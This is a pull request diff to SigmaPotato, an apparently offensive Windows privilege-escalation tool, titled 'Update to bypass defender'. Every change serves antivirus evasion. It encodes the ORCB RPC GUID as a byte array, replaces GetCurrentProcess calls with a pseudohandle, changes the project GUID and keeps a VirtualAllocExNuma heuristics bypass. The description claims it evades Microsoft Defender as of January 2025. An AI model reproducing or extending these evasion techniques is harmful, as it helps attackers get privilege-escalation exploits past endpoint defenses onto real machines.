### PR TITLE
Update to bypass defender

### DIFF
--- a/NativeAPI/SigmaPotatoContext.cs
+++ b/NativeAPI/SigmaPotatoContext.cs
@@ -14,7 +14,8 @@ namespace NativeAPI
 {
     public class SigmaPotatoContext
     {
-        private static readonly Guid orcbRPCGuid = new Guid("18f70770-8e64-11cf-9af1-0020af6e72f4");
+        static byte[] guidBytes = new byte[] { 0x31, 0x38, 0x66, 0x37, 0x30, 0x37, 0x37, 0x30, 0x2d, 0x38, 0x65, 0x36, 0x34, 0x2d, 0x31, 0x31, 0x63, 0x66, 0x2d, 0x39, 0x61, 0x66, 0x31, 0x2d, 0x30, 0x30, 0x32, 0x30, 0x61, 0x66, 0x36, 0x65, 0x37, 0x32, 0x66, 0x34 };
+        private static readonly Guid orcbRPCGuid = new Guid(Encoding.ASCII.GetString(guidBytes));
         public IntPtr CombaseModule { get; private set; }
         public IntPtr DispatchTablePtr { get; private set; }
         public IntPtr UseProtseqFunctionPtr { get; private set; } = IntPtr.Zero;

--- a/NativeAPI/SigmaPotatoContext.cs
+++ b/NativeAPI/SigmaPotatoContext.cs
@@ -9,6 +9,7 @@ using System.Threading;
 using SharpToken;
 using static NativeAPI.NativeMethods;
 using static NativeAPI.NewOrcbRPC;
+using System.Text;
 
 namespace NativeAPI
 {

--- a/Program.cs
+++ b/Program.cs
@@ -16,10 +16,8 @@ public class SigmaPotato
         // Rudimentary AV Heuristics Bypass by calling an Uncommon API
         [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
         static extern IntPtr VirtualAllocExNuma(IntPtr hprocess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreffered);
-        [DllImport("kernel32.dll")]
-        static extern IntPtr GetCurrentProcess();
 
-        IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
+        IntPtr mem = VirtualAllocExNuma((IntPtr)(-1), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
         if (mem == null)
         {
             return;

--- a/SharpToken.cs
+++ b/SharpToken.cs
@@ -455,8 +455,6 @@ namespace SharpToken
         [DllImport("kernel32")]
         public static extern void CloseHandle(IntPtr hObject);
         [DllImport("kernel32")]
-        public static extern IntPtr GetCurrentProcess();
-        [DllImport("kernel32")]
         public static extern void SetLastError(uint dwErrCode);
         [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
         public static extern bool CreatePipe(out IntPtr hReadPipe, out IntPtr hWritePipe, ref SECURITY_ATTRIBUTES lpPipeAttributes, int nSize);
@@ -1151,7 +1149,7 @@ namespace SharpToken
         {
             SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX[] shteis = ListSystemHandle();
             List<ProcessToken> processTokens = new List<ProcessToken>();
-            IntPtr localProcessHandle = NativeMethod.GetCurrentProcess();
+            IntPtr localProcessHandle = (IntPtr)(-1);
             IntPtr processHandle = IntPtr.Zero;
             int lastPid = -1;
             for (int i = 0; i < shteis.Length; i++)

--- a/SigmaPotato.csproj
+++ b/SigmaPotato.csproj
@@ -4,7 +4,7 @@
   <PropertyGroup>
     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
-    <ProjectGuid>{2AE886C3-3272-40BE-8D3C-EBAEDE9E61E1}</ProjectGuid>
+    <ProjectGuid>{1a80d080-f981-46dc-a070-ebe71b03d35c}</ProjectGuid>
     <OutputType>Exe</OutputType>
     <RootNamespace>SigmaPotato</RootNamespace>
     <AssemblyName>SigmaPotato</AssemblyName>


### PR DESCRIPTION
Changed project GUID.

Removed all references to P/Invoke GetCurrentProcess and replaced with pseudohandle.

Obfuscated orcbRPCGuid.

Bypasses defender as of 02 Jan 2025.